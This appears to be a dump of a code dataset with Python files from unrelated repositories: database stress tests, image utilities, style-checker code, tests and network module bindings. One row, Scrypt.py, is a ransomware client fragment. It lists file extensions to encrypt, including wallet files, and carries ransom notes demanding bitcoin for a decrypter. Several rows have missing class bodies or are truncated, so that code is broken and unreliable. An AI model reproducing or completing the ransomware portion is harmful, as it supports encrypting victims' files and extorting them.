hexsha stringlengths 40 40 | size int64 5 2.06M | ext stringclasses 11
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 3 251 | max_stars_repo_name stringlengths 4 130 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 251 | max_issues_repo_name stringlengths 4 130 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 116k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 251 | max_forks_repo_name stringlengths 4 130 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 1 1.05M | avg_line_length float64 1 1.02M | max_line_length int64 3 1.04M | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
113341028baadbdf6860b5c685deb7e0ad58a04a | 186 | py | Python | utils/DiceRatio.py | jasonxingqi/3D-Unet--Tensorflow | d925d3c16d3f02c6cb9cd0e059e30f4455ff299e | [
"MIT"
] | 2 | 2019-04-30T09:09:11.000Z | 2019-05-05T01:50:15.000Z | utils/DiceRatio.py | seanbefore/3D-Unet--Tensorflow | 36a24c38041ad88d74b5d5ab09ded3c3894b00b3 | [
"MIT"
] | null | null | null | utils/DiceRatio.py | seanbefore/3D-Unet--Tensorflow | 36a24c38041ad88d74b5d5ab09ded3c3894b00b3 | [
"MIT"
] | null | null | null | import numpy as np
def dice_ratio(pred, label):
'''Note: pred & label should only contain 0 or 1.
'''
return np.sum(pred[label==1])*2.0 / (np.sum(pred) + np.sum(label)) | 26.571429 | 70 | 0.607527 |
1133ef41069d7316eeeb3a398b4c83b6ef70a38d | 8,408 | py | Python | Client/Scrypt.py | TheRedBladeClan/ScryptRansomware | 79d8eb4e0e72b74a1d37e9723667cdefd259cae4 | [
"MIT"
] | 8 | 2021-08-01T23:34:16.000Z | 2022-01-04T21:37:24.000Z | Client/Scrypt.py | TheRedBladeClan/ScryptRansomware | 79d8eb4e0e72b74a1d37e9723667cdefd259cae4 | [
"MIT"
] | null | null | null | Client/Scrypt.py | TheRedBladeClan/ScryptRansomware | 79d8eb4e0e72b74a1d37e9723667cdefd259cae4 | [
"MIT"
] | 6 | 2021-08-01T23:15:02.000Z | 2022-03-26T13:46:43.000Z | import PyQt5
import PyQt5.QtWidgets
import PyQt5.QtCore
import sys
import requests
import random
import string
import threading
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad, unpad
import os
import shutil
btcAdd = ""
email = ""
discordWebhook = ""
fileTypes = ['.txt','.exe','.php','.pl','.7z','.rar','.m4a','.wma','.avi','.wmv','.csv','.d3dbsp','.sc2save','.sie','.sum','.ibank','.t13','.t12','.qdf','.gdb','.tax','.pkpass','.bc6','.bc7','.bkp','.qic','.bkf','.sidn','.sidd','.mddata','.itl','.itdb','.icxs','.hvpl','.hplg','.hkdb','.mdbackup','.syncdb','.gho','.cas','.svg','.map','.wmo','.itm','.sb','.fos','.mcgame','.vdf','.ztmp','.sis','.sid','.ncf','.menu','.layout','.dmp','.blob','.esm','.001','.vtf','.dazip','.fpk','.mlx','.kf','.iwd','.vpk','.tor','.psk','.rim','.w3x','.fsh','.ntl','.arch00','.lvl','.snx','.cfr','.ff','.vpp_pc','.lrf','.m2','.mcmeta','.vfs0','.mpqge','.kdb','.db0','.mp3','.upx','.rofl','.hkx','.bar','.upk','.das','.iwi','.litemod','.asset','.forge','.ltx','.bsa','.apk','.re4','.sav','.lbf','.slm','.bik','.epk','.rgss3a','.pak','.big','.unity3d','.wotreplay','.xxx','.desc','.py','.m3u','.flv','.js','.css','.rb','.png','.jpeg','.p7c','.p7b','.p12','.pfx','.pem','.crt','.cer','.der','.x3f','.srw','.pef','.ptx','.r3d','.rw2','.rwl','.raw','.raf','.orf','.nrw','.mrwref','.mef','.erf','.kdc','.dcr','.cr2','.crw','.bay','.sr2','.srf','.arw','.3fr','.dng','.jpeg','.jpg','.cdr','.indd','.ai','.eps','.pdf','.pdd','.psd','.dbfv','.mdf','.wb2','.rtf','.wpd','.dxg','.xf','.dwg','.pst','.accdb','.mdb','.pptm','.pptx','.ppt','.xlk','.xlsb','.xlsm','.xlsx','.xls','.wps','.docm','.docx','.doc','.odb','.odc','.odm','.odp','.ods','.odt','.sql','.zip','.tar','.tar.gz','.tgz','.biz','.ocx','.html','.htm','.3gp','.srt','.cpp','.mid','.mkv','.mov','.asf','.mpeg','.vob','.mpg','.fla','.swf','.wav','.qcow2','.vdi','.vmdk','.vmx','.gpg','.aes','.ARC','.PAQ','.tar.bz2','.tbk','.bak','.djv','.djvu','.bmp','.cgm','.tif','.tiff','.NEF','.cmd','.class','.jar','.java','.asp','.brd','.sch','.dch','.dip','.vbs','.asm','.pas','.ldf','.ibd','.MYI','.MYD','.frm','.dbf','.SQLITEDB','.SQLITE3','.asc','.lay6','.lay','.ms11(Securitycopy)','.sldm','.sldx','.ppsm','.ppsx','.ppam','.docb','.mml','.sxm','.otg','.slk','.xlw','.xlt','.xlm','.xlc','.dif','.stc','.sxc','.ots','.ods','.hwp','.dotm','.dotx','.docm','.DOT','.max','.xml','.uot','.stw','.sxw','.ott','.csr','.key','wallet.dat']
detailedNote =f"""
-------------------------------------------------------------------------------------------------------------------------
Hello,\n
If you are reading this then you have likely been hit by Scrypt Ransomware\n
We apologize for the incovience, at the end of the day we just want to get paid\n
In order to receive the decrypter you must follow the following steps to truely recover\n
all your files.\n
1. Download BitPay: https://bitpay.com/wallet/ if you are using a different wallet thats fine.\n
2. Send $50 to this address: {btcAdd}\n
3. After sending it wait for a confirmation and send us an email and include your UniqueID: {Ransomware().randomId}\n
4. Wait shortly, you will receive an email with your decrypter once everything is handled.\n
5. If we do not receive payment within 2 weeks we will no longer be handeling support.
-------------------------------------------------------------------------------------------------------------------------
"""
ransomNote = f"""
All Your Files Have Been Encrypted\n
At the end of the day we just want to get paid\n
Here are the instructions to get getting your files back\n
1. Pay $50 btc to the listed address\n
2. Send an email and include your unique id\n
3. Wait\n
------------------------------------\n
Check your desktop for readme.txt if you are lost!\n
------------------------------------\n
BTC Address: {btcAdd}\n
Email: {email}\n
UniqueID: {Ransomware().randomId}\n
------------------------------------\n
Click the Button Below To Continue:
(Killing this program will result in a full lose of files)\n
"""
if __name__ == "__main__":
app = PyQt5.QtWidgets.QApplication(sys.argv)
l = Scrypt()
sys.exit(app.exec())
| 39.28972 | 2,154 | 0.574215 |
11344bfdd8f3f077e971333f0359d4844c75765b | 611 | py | Python | tests/__init__.py | rhit-goldmate/lab-1 | 4f9f606f24c783495a246c13bde1f24a44bcf247 | [
"MIT"
] | null | null | null | tests/__init__.py | rhit-goldmate/lab-1 | 4f9f606f24c783495a246c13bde1f24a44bcf247 | [
"MIT"
] | null | null | null | tests/__init__.py | rhit-goldmate/lab-1 | 4f9f606f24c783495a246c13bde1f24a44bcf247 | [
"MIT"
] | 1 | 2021-09-13T14:47:48.000Z | 2021-09-13T14:47:48.000Z | import os
from flask import Blueprint, Flask | 35.941176 | 104 | 0.728314 |
1136bb828a12a7dcfde93227e557d6824371edd7 | 845 | py | Python | test/test_DateUtils.py | sebastianhaberey/ctax | b1da8a196560d25d5367e576cc6f659a9572bdc5 | [
"MIT"
] | 10 | 2018-12-18T21:16:47.000Z | 2022-01-17T19:53:33.000Z | test/test_DateUtils.py | sebastianhaberey/ctax | b1da8a196560d25d5367e576cc6f659a9572bdc5 | [
"MIT"
] | 19 | 2018-09-15T18:51:45.000Z | 2018-09-29T18:01:46.000Z | test/test_DateUtils.py | sebastianhaberey/ctax | b1da8a196560d25d5367e576cc6f659a9572bdc5 | [
"MIT"
] | null | null | null | from datetime import datetime
from unittest import TestCase
from dateutil.tz import UTC
from src.DateUtils import get_start_of_year, get_start_of_year_after, date_to_string, date_and_time_to_string
| 36.73913 | 109 | 0.713609 |
1137675ff4573acee0c74caca52ca34bf90e674c | 18,260 | py | Python | third-party/webscalesqlclient/mysql-5.6/mysql-test/suite/innodb_stress/t/load_generator.py | hkirsman/hhvm_centos7_builds | 2a1fd6de0d2d289c1575f43f10018f3bec23bb13 | [
"PHP-3.01",
"Zend-2.0"
] | null | null | null | third-party/webscalesqlclient/mysql-5.6/mysql-test/suite/innodb_stress/t/load_generator.py | hkirsman/hhvm_centos7_builds | 2a1fd6de0d2d289c1575f43f10018f3bec23bb13 | [
"PHP-3.01",
"Zend-2.0"
] | null | null | null | third-party/webscalesqlclient/mysql-5.6/mysql-test/suite/innodb_stress/t/load_generator.py | hkirsman/hhvm_centos7_builds | 2a1fd6de0d2d289c1575f43f10018f3bec23bb13 | [
"PHP-3.01",
"Zend-2.0"
] | null | null | null | import cStringIO
import hashlib
import MySQLdb
import os
import random
import signal
import sys
import threading
import time
import string
import traceback
CHARS = string.letters + string.digits
# Should be deterministic given an idx
# Base class for worker threads
def populate_table(con, num_records_before, do_blob, log, document_table):
con.autocommit(False)
cur = con.cursor()
stmt = None
workers = []
N = num_records_before / 10
start_id = 0
for i in xrange(10):
w = PopulateWorker(MySQLdb.connect(user=user, host=host, port=port, db=db),
start_id, start_id + N, i, document_table)
start_id += N
workers.append(w)
for i in xrange(start_id, num_records_before):
msg = get_msg(do_blob, i)
# print >> log, "length is %d, complen is %d" % (len(msg), len(zlib.compress(msg, 6)))
stmt = get_insert(msg, i+1, document_table)
cur.execute(stmt)
con.commit()
for w in workers:
w.join()
if w.exception:
print >>log, "populater thead %d threw an exception" % w.num
return False
return True
def get_update(msg, idx, document_table):
if document_table:
return """
UPDATE t1 SET doc = '{"msg_prefix" : "%s", "msg" : "%s", "msg_length" : %d,
"msg_checksum" : "%s"}' WHERE id=%d""" % (msg[0:255], msg, len(msg), sha1(msg), idx)
else:
return """
UPDATE t1 SET msg_prefix='%s',msg='%s',msg_length=%d,
msg_checksum='%s' WHERE id=%d """ % (msg[0:255], msg, len(msg), sha1(msg), idx)
def get_insert_on_dup(msg, idx, document_table):
if document_table:
return """
INSERT INTO t1 (id, doc) VALUES
(%d, '{"msg_prefix" : "%s", "msg": "%s", "msg_length" : %d,
"msg_checksum" : "%s"}')
ON DUPLICATE KEY UPDATE
id=VALUES(id),
doc=VALUES(doc)
""" % (idx, msg[0:255], msg, len(msg), sha1(msg))
else:
return """
INSERT INTO t1 (msg_prefix,msg,msg_length,msg_checksum,id)
VALUES ('%s','%s',%d,'%s',%d)
ON DUPLICATE KEY UPDATE
msg_prefix=VALUES(msg_prefix),
msg=VALUES(msg),
msg_length=VALUES(msg_length),
msg_checksum=VALUES(msg_checksum),
id=VALUES(id)""" % (msg[0:255], msg, len(msg), sha1(msg), idx)
def get_insert(msg, idx, document_table):
if document_table:
return """
INSERT INTO t1 (id, doc) VALUES
(%d, '{"msg_prefix" : "%s", "msg": "%s", "msg_length" : %d,
"msg_checksum" : "%s"}')
""" % (idx, msg[0:255], msg, len(msg), sha1(msg))
else:
return """
INSERT INTO t1(id,msg_prefix,msg,msg_length,msg_checksum)
VALUES (%d,'%s','%s',%d,'%s')
""" % (idx, msg[0:255], msg, len(msg), sha1(msg))
def get_insert_null(msg, document_table):
if document_table:
return """
INSERT INTO t1 (id, doc) VALUES
(NULL, '{"msg_prefix" : "%s", "msg": "%s", "msg_length" : %d,
"msg_checksum" : "%s"}')
""" % (msg[0:255], msg, len(msg), sha1(msg))
else:
return """
INSERT INTO t1 (msg_prefix,msg,msg_length,msg_checksum,id) VALUES
('%s','%s',%d,'%s',NULL)
""" % (msg[0:255], msg, len(msg), sha1(msg))
if __name__ == '__main__':
global LG_TMP_DIR
pid_file = sys.argv[1]
kill_db_after = int(sys.argv[2])
num_records_before = int(sys.argv[3])
num_workers = int(sys.argv[4])
num_xactions_per_worker = int(sys.argv[5])
user = sys.argv[6]
host = sys.argv[7]
port = int(sys.argv[8])
db = sys.argv[9]
do_blob = int(sys.argv[10])
max_id = int(sys.argv[11])
LG_TMP_DIR = sys.argv[12]
fake_changes = int(sys.argv[13])
checksum = int(sys.argv[14])
secondary_checks = int(sys.argv[15])
no_defrag = int(sys.argv[16])
document_table = int(sys.argv[17])
checksum_worker = None
defrag_worker = None
workers = []
server_pid = int(open(pid_file).read())
log = open('/%s/main.log' % LG_TMP_DIR, 'a')
# print "kill_db_after = ",kill_db_after," num_records_before = ", \
#num_records_before, " num_workers= ",num_workers, "num_xactions_per_worker =",\
#num_xactions_per_worker, "user = ",user, "host =", host,"port = ",port,\
#" db = ", db, " server_pid = ", server_pid
if num_records_before:
print >> log, "populate table do_blob is %d" % do_blob
con = None
retry = 3
while not con and retry > 0:
con = MySQLdb.connect(user=user, host=host, port=port, db=db)
retry = retry - 1
if not con:
print >> log, "Cannot connect to MySQL after 3 attempts."
sys.exit(1)
if not populate_table(con, num_records_before, do_blob, log,
document_table):
sys.exit(1)
con.close()
if checksum:
print >> log, "start the checksum thread"
con = MySQLdb.connect(user=user, host=host, port=port, db=db)
if not con:
print >> log, "Cannot connect to MySQL server"
sys.exit(1)
checksum_worker = ChecksumWorker(con, checksum)
workers.append(checksum_worker)
print >> log, "start %d threads" % num_workers
for i in xrange(num_workers):
worker = Worker(num_xactions_per_worker, i,
MySQLdb.connect(user=user, host=host, port=port, db=db),
server_pid, do_blob, max_id, fake_changes, secondary_checks,
document_table)
workers.append(worker)
if no_defrag == 0:
defrag_worker = DefragmentWorker(MySQLdb.connect(user=user, host=host,
port=port, db=db))
if kill_db_after:
print >> log, "kill mysqld"
time.sleep(kill_db_after)
os.kill(server_pid, signal.SIGKILL)
worker_failed = False
print >> log, "wait for threads"
for w in workers:
w.join()
if w.exception:
print "Worker hit an exception:\n%s\n" % w.exception
worker_failed = True
if defrag_worker:
defrag_worker.stop()
defrag_worker.join()
if defrag_worker.exception:
print ("Defrag worker hit an exception:\n%s\n." %
defrag_worker.exception)
worker_failed = True
if checksum_worker:
checksum_worker.join()
if checksum_worker.exception:
print ("Checksum worker hit an exception:\n%s\n." %
checksum_worker.exception)
worker_failed = True
if worker_failed:
sys.exit(1)
print >> log, "all threads done"
| 34.130841 | 115 | 0.600657 |
11389b7061e65d0958fbebfba4739239a2fc1bea | 2,037 | py | Python | sancus/lib/cogs/owner/admin_slash.py | Solar-Productions/sancus | eb3c5c702bc5574c62b488c0e3bb06a36159e651 | [
"Apache-2.0"
] | 1 | 2021-09-03T22:52:27.000Z | 2021-09-03T22:52:27.000Z | sancus/lib/cogs/owner/admin_slash.py | LunarDevelop/sancus | eb3c5c702bc5574c62b488c0e3bb06a36159e651 | [
"Apache-2.0"
] | 1 | 2021-10-10T22:11:51.000Z | 2021-10-10T22:11:51.000Z | sancus/lib/cogs/owner/admin_slash.py | Solar-Productions/sancus | eb3c5c702bc5574c62b488c0e3bb06a36159e651 | [
"Apache-2.0"
] | 1 | 2021-11-11T16:04:02.000Z | 2021-11-11T16:04:02.000Z | from configparser import ConfigParser
from glob import glob
from discord import Embed
from discord.ext.commands import Cog, command, group, is_owner
import asyncio
import datetime
import sys
import discord
from discord.ext.commands.context import Context
#from tinker.ext.apps import *
| 37.036364 | 93 | 0.701522 |
113a13cfc94224ffc2876a0d52f150f295d86f1c | 20,820 | py | Python | jscodestyle/main.py | zeth/jscodestyle | 43c98de7b544bf2203b23792677a7cefb5daf1d9 | [
"Apache-2.0"
] | null | null | null | jscodestyle/main.py | zeth/jscodestyle | 43c98de7b544bf2203b23792677a7cefb5daf1d9 | [
"Apache-2.0"
] | null | null | null | jscodestyle/main.py | zeth/jscodestyle | 43c98de7b544bf2203b23792677a7cefb5daf1d9 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# Copyright 2018 The JsCodeStyle Authors.
# Copyright 2007 The Closure Linter Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Checks JavaScript files for common style guide violations.
gjslint.py is designed to be used as a PRESUBMIT script to check for javascript
style guide violations. As of now, it checks for the following violations:
* Missing and extra spaces
* Lines longer than 80 characters
* Missing newline at end of file
* Missing semicolon after function declaration
* Valid JsDoc including parameter matching
Someday it will validate to the best of its ability against the entirety of the
JavaScript style guide.
This file is a front end that parses arguments and flags. The core of the code
is in tokenizer.py and checker.py.
"""
from __future__ import print_function
import argparse
import sys
import time
import os
import glob
import re
import multiprocessing
import errno
from itertools import tee
from functools import partial
from jscodestyle.errorrecord import check_path, fix_path
from jscodestyle.error_check import STRICT_DOC, JSLINT_ERROR_DOC
from jscodestyle.error_fixer import ErrorFixer
GJSLINT_ONLY_FLAGS = ['--unix_mode', '--beep', '--nobeep', '--time',
'--check_html', '--summary', '--quiet']
# Comment - Below are all the arguments from gjslint. There are way
# too many, we should think what is really useful and cull some.
# Perhaps we should rely more on a config file for advance setups
def fix():
"""Automatically fix simple style guide violations."""
style_checker = JsCodeStyle()
style_checker.fix()
def main():
"""Used when called as a command line script."""
style_checker = JsCodeStyle()
style_checker.check()
if __name__ == '__main__':
main()
| 33.365385 | 89 | 0.579443 |
113bd9cbcd07a3d262fa13c56a09b92b81be3c27 | 326 | py | Python | leetcode/code/reverseString.py | exchris/Pythonlearn | 174f38a86cf1c85d6fc099005aab3568e7549cd0 | [
"MIT"
] | null | null | null | leetcode/code/reverseString.py | exchris/Pythonlearn | 174f38a86cf1c85d6fc099005aab3568e7549cd0 | [
"MIT"
] | 1 | 2018-11-27T09:58:54.000Z | 2018-11-27T09:58:54.000Z | leetcode/code/reverseString.py | exchris/pythonlearn | 174f38a86cf1c85d6fc099005aab3568e7549cd0 | [
"MIT"
] | null | null | null | #!/usr/bin/python
# -*- coding:utf-8 -*-
'''
1:
: "hello"
: "olleh"
2:
: "A man, a plan, a canal: Panama"
: "amanaP :lanac a ,nalp a ,nam A"
'''
| 13.583333 | 36 | 0.518405 |
113d668d246018125fb65ca3ee23f8d2a4812ab3 | 343 | py | Python | tracker/admin.py | OscarGichana/tracker | c980f0e348804ae6a2501c09096df1af51b0bba6 | [
"Unlicense"
] | null | null | null | tracker/admin.py | OscarGichana/tracker | c980f0e348804ae6a2501c09096df1af51b0bba6 | [
"Unlicense"
] | null | null | null | tracker/admin.py | OscarGichana/tracker | c980f0e348804ae6a2501c09096df1af51b0bba6 | [
"Unlicense"
] | null | null | null | from django.contrib import admin
from .models import Profile,Neighborhood,Posts,Business
# Register your models here.
admin.site.register(Profile)
admin.site.register(Neighborhood)
admin.site.register(Posts)
admin.site.register(Business)
# admin.site.register(DisLike)
# admin.site.register(MoringaMerch)
# admin.site.register(AwardsProject)
| 28.583333 | 55 | 0.819242 |
113f460e7a9bae8c1f88a8e62410ca63e38c1751 | 62,843 | py | Python | pyls/extra/mclass.py | nemethf/bess-language-server | 25768bfabd3b2f194c14c383e13c96a2c35ab096 | [
"MIT"
] | null | null | null | pyls/extra/mclass.py | nemethf/bess-language-server | 25768bfabd3b2f194c14c383e13c96a2c35ab096 | [
"MIT"
] | null | null | null | pyls/extra/mclass.py | nemethf/bess-language-server | 25768bfabd3b2f194c14c383e13c96a2c35ab096 | [
"MIT"
] | null | null | null | # This file is auto-genereated by bess-gen-doc.
# See https://github.com/nemethf/bess-gen-doc
#
# It is based on bess/protobuf/module_msg.proto, which has the following copyright.
# Copyright (c) 2016-2017, Nefeli Networks, Inc.
# Copyright (c) 2017, The Regents of the University of California.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the names of the copyright holders nor the names of their
# contributors may be used to endorse or promote products derived from this
# software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from pybess.module import Module
from pybess.bess import BESS
bess = BESS()
| 32.095506 | 260 | 0.70926 |
1140bf2a91589655a2b5c15a7d3b4ca12c6d5027 | 409 | py | Python | posts/migrations/0010_auto_20201120_0529.py | vldslv/simple-blog | 85ea180e92a3a584e3b4ae2d97a5224c559a7cc1 | [
"BSD-3-Clause"
] | null | null | null | posts/migrations/0010_auto_20201120_0529.py | vldslv/simple-blog | 85ea180e92a3a584e3b4ae2d97a5224c559a7cc1 | [
"BSD-3-Clause"
] | null | null | null | posts/migrations/0010_auto_20201120_0529.py | vldslv/simple-blog | 85ea180e92a3a584e3b4ae2d97a5224c559a7cc1 | [
"BSD-3-Clause"
] | null | null | null | # Generated by Django 2.2.9 on 2020-11-20 02:29
from django.db import migrations, models
| 22.722222 | 99 | 0.630807 |
1140d660290898ce8ff771db41de2f9db2a0fbed | 350 | py | Python | tests/test_helpers.py | jlmcgehee21/disterminal | 0517483960459d81f2f7361e53c91bd12c12130b | [
"MIT"
] | 10 | 2018-03-25T19:14:21.000Z | 2018-05-20T04:04:27.000Z | tests/test_helpers.py | jlmcgehee21/disterminal | 0517483960459d81f2f7361e53c91bd12c12130b | [
"MIT"
] | 1 | 2018-04-06T17:33:45.000Z | 2018-04-06T17:33:45.000Z | tests/test_helpers.py | jlmcgehee21/disterminal | 0517483960459d81f2f7361e53c91bd12c12130b | [
"MIT"
] | null | null | null | import pytest
from disterminal import helpers
import numpy as np
| 17.5 | 45 | 0.625714 |
114113c2327e984853bcfe3d2bdb8fbe4a9538bc | 4,149 | py | Python | tests/test_lookups.py | gluk-w/python-tuple-lookup | b0c44bb8fb9c94925c97b54b02ffc8abeb570914 | [
"MIT"
] | null | null | null | tests/test_lookups.py | gluk-w/python-tuple-lookup | b0c44bb8fb9c94925c97b54b02ffc8abeb570914 | [
"MIT"
] | null | null | null | tests/test_lookups.py | gluk-w/python-tuple-lookup | b0c44bb8fb9c94925c97b54b02ffc8abeb570914 | [
"MIT"
] | null | null | null | import pytest
from listlookup import ListLookup
sample_list = [
{"id": 1, "country": "us", "name": "Atlanta"},
{"id": 2, "country": "us", "name": "Miami"},
{"id": 3, "country": "uk", "name": "Britain"},
{"id": 5, "country": "uk", "name": "Bermingham"},
{"id": 4, "country": "ca", "name": "Barrie"},
]
def test_lookup_does_not_modify_indexes():
"""
There was a bug that modified index after lookup
"""
cities = ListLookup(sample_list)
cities.index("country", lambda d: d['country'])
cities.index("name", lambda d: d['name'])
result = list(cities.lookup(country='us', name='Miami'))
assert len(result) == 1
second_res = list(cities.lookup(country='us', name='Atlanta'))
assert len(second_res) == 1
| 31.195489 | 114 | 0.614124 |
1143cbb13d91eca82341ad8a60ceba57b21e31ee | 13,697 | py | Python | ImagePipeline_utils.py | titsitits/image-restoration | 7434917c8e14c9c78cd1a9aa06ff1a058368543b | [
"Apache-2.0"
] | 18 | 2019-07-24T15:58:11.000Z | 2022-02-16T04:14:15.000Z | ImagePipeline_utils.py | titsitits/image-restoration | 7434917c8e14c9c78cd1a9aa06ff1a058368543b | [
"Apache-2.0"
] | 2 | 2020-09-15T10:26:31.000Z | 2021-02-23T16:52:50.000Z | ImagePipeline_utils.py | titsitits/image-restoration | 7434917c8e14c9c78cd1a9aa06ff1a058368543b | [
"Apache-2.0"
] | 7 | 2019-10-01T07:28:58.000Z | 2022-01-08T12:45:01.000Z | import time
import numpy as np
import os, sys, shutil
from contextlib import contextmanager
from numba import cuda as ncuda
import PIL
from PIL import Image, ImageFilter, ImageDraw, ImageFont
import cv2
import contextlib
from copy import deepcopy
import subprocess
from glob import glob
from os import path as osp
from os import path
utilspath = os.path.join(os.getcwd(), 'utils/')
def duplicatedir(src,dst):
if not os.path.exists(src):
print('ImagePipeline_utils. duplicatedir: Source directory does not exists!')
return
if src != dst:
if os.path.exists(dst):
shutil.rmtree(dst)
shutil.copytree(src=src,dst=dst)
import os, time, datetime
#import PIL.Image as Image
import numpy as np
from skimage.measure import compare_psnr, compare_ssim
from skimage.io import imread, imsave
fontfile = os.path.join(utilspath,"arial.ttf")
utilspath = os.path.join(os.getcwd(), 'utils/')
fontfile = os.path.join(utilspath,"arial.ttf")
def concat_images(img_list, labels = [], imagetype = None, sameheight = True, imagewidth = None, imageheight = None, labelsize = 30, labelpos = (10,10), labelcolor = None):
"""
imagetype: allow to convert all images to a PIL.Image.mode (L = grayscale, RGB, RGBA, ...)
sameheight: put all images to same height (size of smallest image of the list, or imageheight if not None)
imageheight: if not None, force all images to have this height (keep aspect ratio). Force sameheight to True
imagewidth: if not None, force all images to have this width (keep aspect ratio if sameheight=False and imageheight=None)
"""
images = deepcopy(img_list)
if imagetype == None:
imagetype = 'RGB'
images = [im.convert(imagetype) for im in images]
#force all image to imageheight (keep aspect ratio)
if imageheight is not None:
sameheight = True
widths, heights = zip(*(i.size for i in images))
#resize needed ?
if ( (len(set(heights)) > 1) & sameheight ) or (imageheight is not None) or (imagewidth is not None):
if imageheight is None:
imageheight = min(heights)
#force all images to same width
if imagewidth is not None:
if sameheight: #force width and height
images = [im.resize( (int(imagewidth),int(imageheight)),PIL.Image.ANTIALIAS ) for im in images]
else: #force width (keep aspect ratio)
images = [im.resize( (int(imagewidth),int(im.height*imagewidth/im.width)),PIL.Image.ANTIALIAS ) for im in images]
else: #force height (keep aspect ratio)
images = [im.resize( (int(im.width*imageheight/im.height), imageheight) ,PIL.Image.ANTIALIAS) for im in images]
widths, heights = zip(*(i.size for i in images))
total_width = sum(widths)
max_height = max(heights)
new_im = PIL.Image.new(imagetype, (total_width, max_height))
#add labels to images
if len(labels) == len(images):
fnt = ImageFont.truetype(fontfile, labelsize)
if imagetype == 'L':
fill = 240
elif imagetype == 'RGB':
fill = (176,196,222)
elif imagetype == 'RGBA':
fill = (176,196,222,0)
if labelcolor is not None:
fill = labelcolor
for i in range(len(labels)):
d = ImageDraw.Draw(images[i]).text(labelpos, labels[i], font = fnt, fill = fill)
x_offset = 0
for im in images:
new_im.paste(im, (x_offset,0))
x_offset += im.size[0]
return new_im
def clone_git(url, dir_name = None, tag = None, reclone = False):
"""
url: url of the git repository to clone
dir_name: name of the folder to give to the repository. If not given, the git repository name is used
tag: allows to checkout a specific commit if given
reclone: overwrite existing repo
"""
old_dir = os.getcwd()
if dir_name is None:
dir_name = os.path.split(url)[1] #use git repo name
dir_name = os.path.splitext(dir_name)[0] #remove ".git" if present
if reclone and os.path.exists(dir_name):
shutil.rmtree(dir_name)
if not os.path.exists(dir_name):
command = "git clone %s %s" % (url, dir_name)
subprocess.run(command, shell = True)
os.chdir(dir_name)
if tag is not None:
command = "git checkout %s" % tag
subprocess.run(command, shell = True)
git_path = os.path.join(os.getcwd())
os.chdir(old_dir)
return git_path
| 24.768535 | 172 | 0.678032 |
1144dfe3b0de92ac50325fd69bcff937bffb9527 | 371 | py | Python | py_tea_code/2.mypro_io/test_os/my05.py | qq4215279/study_python | b0eb9dedfc4abb2fd6c024a599e7375869c3d77a | [
"Apache-2.0"
] | null | null | null | py_tea_code/2.mypro_io/test_os/my05.py | qq4215279/study_python | b0eb9dedfc4abb2fd6c024a599e7375869c3d77a | [
"Apache-2.0"
] | null | null | null | py_tea_code/2.mypro_io/test_os/my05.py | qq4215279/study_python | b0eb9dedfc4abb2fd6c024a599e7375869c3d77a | [
"Apache-2.0"
] | null | null | null | #coding=utf-8
#os.walk()
import os
all_files = []
path = os.getcwd()
list_files = os.walk(path)
for dirpath,dirnames,filenames in list_files:
for dir in dirnames:
all_files.append(os.path.join(dirpath,dir))
for file in filenames:
all_files.append(os.path.join(dirpath,file))
#
for file in all_files:
print(file) | 20.611111 | 52 | 0.71159 |
1144ebed87008c80403fadd34329c7f64e53da5b | 2,801 | py | Python | lib_drl/layer_utils/proposal_layer.py | chang010453/GRP-HAI | 60f7c7633e33dbdd852f5df3e0a3d1017b6b2a22 | [
"MIT"
] | null | null | null | lib_drl/layer_utils/proposal_layer.py | chang010453/GRP-HAI | 60f7c7633e33dbdd852f5df3e0a3d1017b6b2a22 | [
"MIT"
